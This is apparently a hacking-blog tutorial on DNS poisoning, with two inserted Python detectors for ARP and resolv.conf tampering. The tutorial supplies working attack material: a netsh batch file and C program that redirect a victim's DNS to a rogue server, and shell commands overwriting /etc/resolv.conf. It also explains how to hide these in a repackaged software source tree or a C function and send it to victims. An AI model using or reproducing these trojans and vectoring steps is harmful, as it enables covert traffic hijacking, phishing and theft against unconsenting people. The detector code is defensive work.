Before we proceed to DNS poisoning, let's have a look at some basics, starting with what DNS is. You already know the internet runs on the TCP/IP model, or the internet protocol stack. The TCP/IP stack specifies and uses IP addresses (example: 204.87.98.34) to route data between source and destination computers. Every computer in the world that is connected to a network has an IP address. Since remembering IP addresses is difficult, each IP address is associated with a name like www.google.com, which is also known as a domain name. Domain names are easy to remember, but the original TCP/IP stack needs an IP address for communication, not the domain name. So a service has been created to convert these domain names into their respective IP addresses; this service is known as the Domain Name Service (DNS), and a computer or system which provides this service is known as a Domain Name System. Now you can call it a coincidence that Domain Name Service and Domain Name System both end up having the same abbreviation, DNS, and the best part is that they don't even conflict with each other in use.
A DNS runs on the DNS protocol, which translates a web address into its respective IP address. Now DNS poisoning, or DNS spoofing, is a technique by which an attacker provides a wrong IP address to a DNS server in order to misdirect users to fake websites. Following are the types of DNS poisoning; in future posts we will cover them briefly:
- Intranet DNS Spoofing/Poisoning
- Internet DNS Spoofing/Poisoning
- Proxy Server DNS Spoofing/Poisoning
- DNS Cache Spoofing/Poisoning
Intranet DNS poisoning is done over a LAN. It is usually performed over a switched network with the help of ARP poisoning. You can use Cain And Abel to perform this kind of attack. Internet DNS poisoning can be done against any system across the world by changing the DNS entries of the victim's computer. In Proxy Server DNS poisoning we change the proxy settings of the victim to our IP address and then redirect the victim to a fake website. In DNS cache poisoning an attacker changes the IP address entries of the target website on some specific DNS server; then, if any person asks that DNS server for information, it will provide them the fake IP information.
Intranet DNS Poisoning
In this post we will discuss our very first method of poisoning DNS, i.e. Intranet DNS poisoning.
The Intranet DNS poisoning attack is done over a LAN which has been ARP poisoned. Since I'll not repeat how to poison ARP, please read my previous tutorial on ARP poisoning. For performing this DNS poisoning attack you'll need at least three computers connected in a LAN, for which the same router, switch or computer should act as gateway, and any man-in-the-middle attack tool; for this tutorial I am using Cain And Abel. Make sure your setup matches the following diagram.
Note that this attack works well on a switched network; a hub-based network will also work, but the result will not be as effective as on a switched network. Now Google for Cain And Abel, download it and poison the ARP table. Then click on APR-DNS at the bottom and add a host name to it.
Now something important: of all the DNS poisoning methods, Intranet DNS poisoning is the easiest and doesn't require any technical skill, because you don't have to set up a DNS server, but for all the other methods you must know how to set up a DNS server. I will try my best to keep things as easy as I can, but as advice I would recommend that you Google a little and get some information about how to set up a DNS server. If I had to perform the above attack, my choice of tool would be Ettercap; I did this tutorial with Cain And Abel just because it's easy to use and we covered ARP poisoning using Cain and not Ettercap.
Cain is easy for someone who is a beginner, so just take this tutorial as a start-up piece; after getting a little understanding of how DNS poisoning is done, try the same with Ettercap. So the easiest DNS poisoning method, i.e. Intranet DNS poisoning, is done; next time we will see the Internet DNS poisoning method. Thanks for reading and keep visiting.
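The intranet method above only works once the ARP table of the victim (or the gateway) has been poisoned, so the ARP table is the first place a defender on the LAN should look. The following is an added example, not code from the original tutorial or from Cain And Abel: it parses Linux `arp -n` style output and flags the two classic indicators of ARP poisoning, one MAC address claimed by several IP addresses, and the gateway's MAC differing from a value pinned earlier on a clean network. The sample ARP output, the gateway IP and the pinned gateway MAC are constructed for the example.

```python
"""Added example (not from the original tutorial): spot a poisoned ARP table,
the precondition for the intranet DNS poisoning attack described above."""

import re
from collections import defaultdict

# Constructed sample of `arp -n` output on a Linux host (two IPs share one MAC).
SAMPLE_ARP_OUTPUT = """\
Address                  HWtype  HWaddress           Flags Mask            Iface
192.168.1.1              ether   de:ad:be:ef:00:01   C                     eth0
192.168.1.20             ether   00:11:22:33:44:55   C                     eth0
192.168.1.37             ether   de:ad:be:ef:00:01   C                     eth0
192.168.1.50                     (incomplete)                              eth0
"""

# Constructed: the gateway address and the MAC recorded for it on a clean network.
GATEWAY_IP = "192.168.1.1"
PINNED_GATEWAY_MAC = "aa:bb:cc:dd:ee:01"

# One `arp -n` entry: IP, hardware type, MAC. Header and "(incomplete)" rows do not match.
ARP_LINE = re.compile(
    r"^(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\s+\S+\s+(?P<mac>(?:[0-9a-f]{2}:){5}[0-9a-f]{2})\s",
    re.IGNORECASE,
)


def parse_arp_table(text):
    """Return {ip: mac} from `arp -n` output, skipping the header and incomplete entries."""
    table = {}
    for line in text.splitlines():
        m = ARP_LINE.match(line)
        if m:
            table[m.group("ip")] = m.group("mac").lower()
    return table


def find_arp_anomalies(table, gateway_ip, pinned_gateway_mac):
    """Return a list of findings; an empty list means nothing suspicious was seen."""
    findings = []

    # Indicator 1: a single MAC answering for more than one IP address.
    by_mac = defaultdict(list)
    for ip, mac in table.items():
        by_mac[mac].append(ip)
    for mac, ips in by_mac.items():
        if len(ips) > 1:
            findings.append(f"MAC {mac} is claimed by {len(ips)} addresses: {', '.join(sorted(ips))}")

    # Indicator 2: the gateway's MAC no longer matches the pinned value.
    gw_mac = table.get(gateway_ip)
    if gw_mac is None:
        findings.append(f"gateway {gateway_ip} has no ARP entry")
    elif gw_mac != pinned_gateway_mac.lower():
        findings.append(f"gateway {gateway_ip} resolves to {gw_mac}, expected {pinned_gateway_mac}")
    return findings


if __name__ == "__main__":
    table = parse_arp_table(SAMPLE_ARP_OUTPUT)
    for finding in find_arp_anomalies(table, GATEWAY_IP, PINNED_GATEWAY_MAC):
        print("ALERT:", finding)
```

On a live host, replace SAMPLE_ARP_OUTPUT with the output of `arp -n` (or `ip neigh`, after adjusting the regex) and keep the pinned gateway MAC somewhere the attacker cannot rewrite, such as a static ARP entry or a monitoring server.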
Internet DNS Poisoning
Following is our second tutorial on DNS Poisoning, which is Internet DNS Poisoning, also known as Remote DNS Poisoning. This type of DNS poisoning can be done against a single victim or multiple victims, and no matter where your victim is in the world, the primary DNS entries of his/her system can be poisoned using this method. For this type of DNS poisoning attack you'll have to set up a rogue DNS server somewhere with a static IP address, and please note that it should be in working condition. The methods of poisoning are different for Windows and Linux systems, but both happen with the help of the same entity, a Trojan file.
Here I'll show you how to create DNS poisoning Trojans; all you have to do is vector them.
For Windows:
For poisoning the DNS of a victim you must know the name of his/her interface, or the name he/she has set for his/her internet connection. This condition is a must for you to poison the victim's DNS; if you don't know the value, then use the default "Local Area Connection". Now let's create a DNS spoofing Trojan batch file. Type the following line in Notepad and save it with any name and a .bat extension.
netsh interface ip set dns "Local Area Connection" static 115.98.23.45
The above command will set the DNS server of the victim to 115.98.23.45; you can replace "Local Area Connection" with the name of the interface or connection if you know it, else always go with the default. Now send that file to the victim for poisoning his/her DNS entries. If you don't want to send a .bat file because your victim might suspect it, then you can create an executable file by compiling the following C program.
#include <stdio.h>
#include <stdlib.h>   /* system() */

int main(void)
{
    /* The inner double quotes must be escaped inside a C string literal. */
    char *str = "netsh interface ip set dns \"Local Area Connection\" static 115.98.23.45";
    system(str);
    return 0;
}
For Linux And UNIX:
Linux and UNIX systems save DNS entries in the /etc/resolv.conf file; changing the entries in this file can help you poison DNS on Linux and UNIX systems. Now get the IP address of a working DNS server and the IP address of the rogue DNS server set up by you. Suppose the IP address of the rogue DNS is 115.98.23.45 and the real DNS server is 117.98.23.48. Then type the following commands in a text file and save it with a .sh extension (for example change.sh).
echo "nameserver 115.98.23.45" > /etc/resolv.conf
echo "nameserver 117.98.23.48" >> /etc/resolv.conf
Now all you have to do is vector this file to the victim. For vectoring it, get any source code installation package from the internet of an interesting piece of software your victim can't refuse to install on his/her system. Extract it and find a shell script in it, place change.sh in that folder, open the target shell script in a text editor and, before it ends, type the following commands:
chmod +x change.sh
./change.sh
Pack it again and send it to your victim for installation; once he/she installs the software from your source code he/she will be infected. Now sometimes it's difficult to find a shell script in a package, but what is not difficult to find is a C source file. So if you have a problem with the above method, find a C source file with several functions in it and create the following new function in it.
#include <stdlib.h>   /* system(); add this include at the top of the file if it is not already there */

void change12345(void)
{
    char *str;
    /* Inner double quotes are escaped so the shell receives them. */
    str = "echo \"nameserver 115.98.23.45\" > /etc/resolv.conf";
    system(str);
    str = "echo \"nameserver 117.98.23.48\" >> /etc/resolv.conf";
    system(str);
    return;
}
And call this function in any other function before it returns something. Pack the files again and send them to your victim; your code will execute every time your victim launches that program.
Now note that the above exploit codes are really very basic; you can modify them according to your needs, and if you think they are difficult to understand please get your hands on programming. Even if you understand only basic programming you can write your own exploit codes. Please read the books section to have a look at which books I recommend you begin with for programming.
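Both variants of this method leave the same trace: the resolver list on the victim has a server in it that nobody approved, written first so that the legitimate server behind it keeps lookups working. The following is an added example, not code from the original tutorial: a small integrity check that parses /etc/resolv.conf, compares the nameserver entries against an allowlist of approved resolvers, and reports both unknown servers and a changed primary. The resolv.conf contents and the allowlist are constructed; the rogue and real addresses reuse the ones from the text. On the Windows side the same comparison applies to the servers shown by `netsh interface ip show dns`, but this example only parses the resolv.conf format.

```python
"""Added example (not from the original tutorial): detect a tampered
/etc/resolv.conf by comparing its nameserver entries against an allowlist."""

import ipaddress

# Constructed: resolvers the organisation actually approves; the first one is the
# expected primary resolver.
APPROVED_NAMESERVERS = ["117.98.23.48"]

# Constructed resolv.conf contents after the change described in the text:
# the rogue resolver is first, the real one second so lookups keep working.
TAMPERED_RESOLV_CONF = """\
# Generated by NetworkManager
search corp.example
nameserver 115.98.23.45
nameserver 117.98.23.48
options timeout:2
"""

CLEAN_RESOLV_CONF = """\
search corp.example
nameserver 117.98.23.48
"""


def parse_nameservers(text):
    """Return the nameserver addresses in file order.

    Comments ('#' or ';'), blank lines and other directives (search, options, ...)
    are ignored. A nameserver line whose value is not a valid IP address raises
    ValueError rather than being silently skipped, because a resolver that does
    not parse is itself worth a look."""
    servers = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].split(";", 1)[0].strip()
        if not line:
            continue
        parts = line.split()
        if parts[0] != "nameserver":
            continue
        if len(parts) != 2:
            raise ValueError(f"malformed nameserver line: {raw!r}")
        try:
            servers.append(str(ipaddress.ip_address(parts[1])))
        except ValueError:
            raise ValueError(f"malformed nameserver line: {raw!r}") from None
    return servers


def check_resolvers(text, approved):
    """Return a list of findings; an empty list means the file matches the allowlist."""
    findings = []
    servers = parse_nameservers(text)
    approved_set = set(approved)
    for server in servers:
        if server not in approved_set:
            findings.append(f"unapproved nameserver {server}")
    if not servers:
        findings.append("no nameserver configured")
    elif servers[0] != approved[0]:
        findings.append(f"primary resolver is {servers[0]}, expected {approved[0]}")
    return findings


def check_file(path="/etc/resolv.conf", approved=APPROVED_NAMESERVERS):
    """Run the check against a real file on the host."""
    with open(path, encoding="utf-8") as fh:
        return check_resolvers(fh.read(), approved)


if __name__ == "__main__":
    for label, contents in (("clean", CLEAN_RESOLV_CONF), ("tampered", TAMPERED_RESOLV_CONF)):
        findings = check_resolvers(contents, APPROVED_NAMESERVERS)
        print(f"{label}: {'OK' if not findings else '; '.join(findings)}")
```

Run `check_file()` from a cron job or a configuration-management check; the allowlist should live outside the host being checked, since a script that can rewrite resolv.conf can rewrite a local allowlist just as easily.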
Proxy Server DNS Poisoning
For this type of DNS poisoning method an attacker sets up a proxy server on his/her system. Then he/she sets up a rogue DNS server and keeps its IP address as the primary DNS entry on the proxy server system. Now he/she has to convince the victim to use the proxy server set up by him/her. Since the proxy server has a rogue DNS server as its primary DNS, all requests will pass through it. Since all traffic passes through your system as the proxy server, you can sniff all traffic between the victim and the sites he/she communicates with, and also perform the DNS poisoning attack.